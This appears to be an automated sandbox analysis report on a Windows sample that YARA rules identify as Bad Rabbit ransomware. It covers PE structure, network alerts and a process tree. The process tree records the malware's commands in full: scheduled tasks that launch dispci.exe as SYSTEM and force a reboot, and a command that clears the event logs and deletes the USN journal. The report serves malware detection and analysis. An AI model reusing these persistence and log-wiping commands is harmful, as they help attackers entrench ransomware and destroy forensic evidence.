                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x689a30x3488
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x110000x1a8.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x40000x74.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x2ed30x3000098c323b1a59bcf15c1feb8055e58931False0.6101888020833334data6.5841037789243835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x40000x302a0x32009cc3629beb9d1f37932d860de2e3a4f5False0.81data7.1772588683417196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x80000x33c0x2004e5d61b2bd73632f0225e39a2e2c5144False0.048828125data0.1833387916558982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x90000x70880x7200256c5e23a9ad8a276128f84017b2d79dFalse0.16615268640350878data4.204085780982396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x110000x24e0x40026cd68101ade4e5f70ab3cd5f35e0ad5False0.41796875data3.293138685594118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x92540xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.20309168443496803
                                            RT_ICON0xa0fc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.21931407942238268
                                            RT_ICON0xa9a40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.2203757225433526
                                            RT_ICON0xaf0c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.19230769230769232
                                            RT_ICON0xbfb40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.14014522821576764
                                            RT_ICON0xe55c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.19230769230769232
                                            RT_ICON0xf6040x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.39893617021276595
                                            RT_GROUP_ICON0xfa6c0x68dataEnglishUnited States0.6826923076923077
                                            RT_VERSION0xfad40x450dataEnglishUnited States0.37681159420289856
                                            RT_MANIFEST0xff240x161ASCII text, with CRLF line terminatorsEnglishUnited States0.5495750708215298

                                            Imports

                                            DLLImport
                                            KERNEL32.dllExitProcess, GetCommandLineW, GetFileSize, CreateProcessW, HeapAlloc, HeapFree, GetModuleHandleW, GetProcessHeap, WriteFile, GetSystemDirectoryW, ReadFile, GetModuleFileNameW, CreateFileW, lstrcatW, CloseHandle, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter
                                            USER32.dllwsprintfW
                                            SHELL32.dllCommandLineToArgvW
                                            msvcrt.dllwcsstr, memcpy, free, malloc

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-07-25T08:19:02.999617+0200TCP2840787ETPRO HUNTING Request for config.json49710443192.168.2.7184.28.90.27
                                            2024-07-25T08:19:07.858858+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972240.68.123.157192.168.2.7
                                            2024-07-25T08:19:03.471374+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49713443192.168.2.723.216.207.31
                                            2024-07-25T08:19:44.974242+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974752.165.165.26192.168.2.7

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 25, 2024 08:18:46.451400995 CEST49674443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:46.451402903 CEST49675443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:46.529516935 CEST49672443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.596013069 CEST49701445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.601619005 CEST44549701104.98.116.138192.168.2.7
                                            Jul 25, 2024 08:18:52.601710081 CEST49701445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.602209091 CEST49701445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.607316017 CEST44549701104.98.116.138192.168.2.7
                                            Jul 25, 2024 08:18:52.628818035 CEST4970280192.168.2.7192.168.2.1
                                            Jul 25, 2024 08:18:52.705909014 CEST49704445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.710833073 CEST44549704104.98.116.138192.168.2.7
                                            Jul 25, 2024 08:18:52.710911989 CEST49704445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.710953951 CEST49704445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:52.716131926 CEST44549704104.98.116.138192.168.2.7
                                            Jul 25, 2024 08:18:53.623265982 CEST4970280192.168.2.7192.168.2.1
                                            Jul 25, 2024 08:18:55.623266935 CEST4970280192.168.2.7192.168.2.1
                                            Jul 25, 2024 08:18:56.060759068 CEST49674443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:56.060791016 CEST49675443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:56.138887882 CEST49672443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:56.821264982 CEST49699443192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:18:57.002284050 CEST49704445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:19:13.993629932 CEST44549701104.98.116.138192.168.2.7
                                            Jul 25, 2024 08:19:13.993866920 CEST49701445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:19:13.993947983 CEST49701445192.168.2.7104.98.116.138
                                            Jul 25, 2024 08:19:14.274425983 CEST44549701104.98.116.138192.168.2.7
                                            Jul 25, 2024 08:19:14.274560928 CEST49701445192.168.2.7104.98.116.138

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 25, 2024 08:18:55.518707037 CEST5207153192.168.2.71.1.1.1
                                            Jul 25, 2024 08:19:02.633927107 CEST5779853192.168.2.71.1.1.1

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Jul 25, 2024 08:18:52.628881931 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                            Jul 25, 2024 08:18:53.623317003 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                            Jul 25, 2024 08:18:55.623301029 CEST192.168.2.1192.168.2.7827c(Port unreachable)Destination Unreachable
                                            Jul 25, 2024 08:19:12.301007032 CEST192.168.2.7192.168.2.18273(Port unreachable)Destination Unreachable
                                            Jul 25, 2024 08:20:32.486186981 CEST192.168.2.7192.168.2.18273(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jul 25, 2024 08:18:55.518707037 CEST192.168.2.71.1.1.10x4896Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                            Jul 25, 2024 08:19:02.633927107 CEST192.168.2.71.1.1.10x5c6fStandard query (0)api.msn.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 25, 2024 08:18:55.528186083 CEST1.1.1.1192.168.2.70x4896No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                            Jul 25, 2024 08:19:02.641774893 CEST1.1.1.1192.168.2.70x5c6fNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:02:18:48
                                            Start date:25/07/2024
                                            Path:C:\Users\user\Desktop\LisectAVT_2403002C_35.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002C_35.exe"
                                            Imagebase:0x510000
                                            File size:441'910 bytes
                                            MD5 hash:D7AD0CDDA235608CB4AFB702562FDCFD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:02:18:49
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:02:18:49
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                            Imagebase:0xb30000
                                            File size:61'440 bytes
                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, Author: Christiaan Beek
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:02:18:49
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Delete /F /TN rhaegal
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:02:18:49
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:02:18:49
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Delete /F /TN rhaegal
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:02:18:50
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:02:18:50
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\SgrmBroker.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                            Imagebase:0x7ff7c3260000
                                            File size:329'504 bytes
                                            MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:9
                                            Start time:02:18:50
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:10
                                            Start time:02:18:50
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:02:18:50
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:12
                                            Start time:02:18:50
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:14
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:15
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:16
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:18
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\D99F.tmp
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9}
                                            Imagebase:0x7ff609750000
                                            File size:62'328 bytes
                                            MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:22
                                            Start time:02:18:51
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:23
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:24
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\wevtutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:wevtutil cl Setup
                                            Imagebase:0x8d0000
                                            File size:208'384 bytes
                                            MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\wevtutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:wevtutil cl System
                                            Imagebase:0x8d0000
                                            File size:208'384 bytes
                                            MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\wevtutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:wevtutil cl Security
                                            Imagebase:0x8d0000
                                            File size:208'384 bytes
                                            MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\wevtutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:wevtutil cl Application
                                            Imagebase:0x8d0000
                                            File size:208'384 bytes
                                            MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:29
                                            Start time:02:18:52
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\fsutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:fsutil usn deletejournal /D C:
                                            Imagebase:0xd0000
                                            File size:167'440 bytes
                                            MD5 hash:452CA7574A1B2550CD9FF83DDBE87463
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:30
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit
                                            Imagebase:0x7ff629640000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:31
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:32
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\dispci.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\dispci.exe" -id 1283680486
                                            Imagebase:0xa80000
                                            File size:142'848 bytes
                                            MD5 hash:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                            • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 96%, ReversingLabs
                                            Has exited:true

                                            General

                                            Target ID:33
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:34
                                            Start time:02:18:54
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Delete /F /TN rhaegal
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:35
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:36
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:37
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Delete /F /TN rhaegal
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:38
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c schtasks /Delete /F /TN drogon
                                            Imagebase:0x410000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:39
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:40
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\LogonUI.exe
                                            Wow64 process (32bit):false
                                            Commandline:"LogonUI.exe" /flags:0x4 /state0:0xa3f80855 /state1:0x41c64e6d
                                            Imagebase:0x7ff778710000
                                            File size:13'824 bytes
                                            MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:41
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks /Delete /F /TN drogon
                                            Imagebase:0xb0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:42
                                            Start time:02:18:55
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
